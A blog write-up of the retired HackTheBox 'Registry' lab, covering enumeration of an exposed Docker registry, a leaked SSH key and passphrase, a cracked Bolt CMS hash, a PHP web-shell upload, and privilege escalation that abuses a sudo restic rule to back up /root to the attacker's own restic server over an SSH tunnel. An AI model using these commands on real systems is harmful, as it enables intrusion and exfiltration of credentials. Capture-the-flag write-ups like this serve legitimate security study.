Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
HackTheBox - Registry
|htbmachinesretired|

Summary

Registry,a Linux box created by HackTheBox user thek, was an overall medium to hard difficulty box.The inital enumeration expose a docker registry from where you can download an image which contain a ssh key for the user.SSH into the box we find nginx config which point us to bolt db. Cracking the password in bolt db we get access to bolt webserver and we can upload a ph0ny shell and get www-data user which have access to run restic backup as root. using that we can get root.

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# Nmap 7.80 scan initiated Wed Nov  6 23:00:12 2019 as: nmap -sC -sV -oN nmap/registry 10.10.10.159
Nmap scan report for 10.10.10.159
Host is up (0.15s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
|   256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
|_  256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
80/tcp   open  http     nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
443/tcp  open  ssl/http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=docker.registry.htb
| Not valid before: 2019-05-06T21:14:35
|_Not valid after:  2029-05-03T21:14:35
8000/tcp open  http     Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov  6 23:00:34 2019 -- 1 IP address (1 host up) scanned in 22.58 seconds

Adding docker.registry.htb from the Certificate and visiting it we see it is a docker registry.This reminded me of the blog i read which shows us why we should always have authenticated APIs.

Using the above blog we leak information by visiting

1
2
3
https://docker.registry.htb/v2/_catalog
https://docker.registry.htb/v2/bolt-image/tags/list
https://docker.registry.htb/v2/bolt-image/manifests/latest

and we can download the image blobs extracting that as it is just a tar file. we can get the content inside the image we find an id_rsa key for user bolt.

Enumerating more we see /etc/profile.d/01-ssh.sh in .bash_history viewing that file give us the passphrase for the key as GkOcz221Ftb3ugog.

User Shell

With the above creds we can ssh as bolt on the server and can grab user.txt.

Enumerating in box we don’t see any direct way from bolt to root.

Looking for something interesting we see bolt CMS is running on registry.htb/bolt
Turns out there is a lovely hash waiting for us in this folder:bolt@bolt:/var/www/html/bolt/app/database$opening bolt.db reveals this

1
admin$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PKbolt@registry.htb

Cracking that we get the password as strawberry

Getting www-data

Login to the page with admin:strawberry
Find this about Bolt CMS:https://fgsec.net/from-csrf-to-rce-bolt-cms/

So basically, I can add php to the accepted extensions and upload my php shell:

Doing that and uploading a p0wny shell to get a web-shell as www-data

Privilege Escalation

Doing sudo -l shows us that www-data can run

1
2
3
4
Matching Defaults entries for www-data on bolt:
    env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bolt:
    (root) NOPASSWD: /usr/bin/restic backup -r rest*

Looking for restic. we see restic is a backup program

The first thing come in my mind is to create a backup of /root/ and push that to our rouge server and restore it there.

Lets do that then

To do that we need to install restic on our box and create a empty repository

However to do that we need to use restic-server to listen for the snapshot.

Lets Initialized restic by
restic init --repo .

Create a restic server with:
./rest-server-0.9.7-linux-amd64 --log --private-repos --path .

but we need to do port forwarding first so we can be able to transfer the snapshot:

1
ssh -R 127.0.0.1:8000:127.0.0.1:8000 -i ./loot/docker-bolt/id_rsa bolt@10.10.10.159

Transfer the backup with

1
echo password | sudo restic backup -r rest:http://127.0.0.1:8000 /root

on ph0wny shell.

Restoring the snapshot using

1
restic restore -r rest:http://localhost:8000 8a9229d6 --target .

We can get the private key of root and also root.txt which proves we have pwned this box.

💃
Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/registry/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
linuxwriteupretiredhacktheboxmediumdocker-registryrestic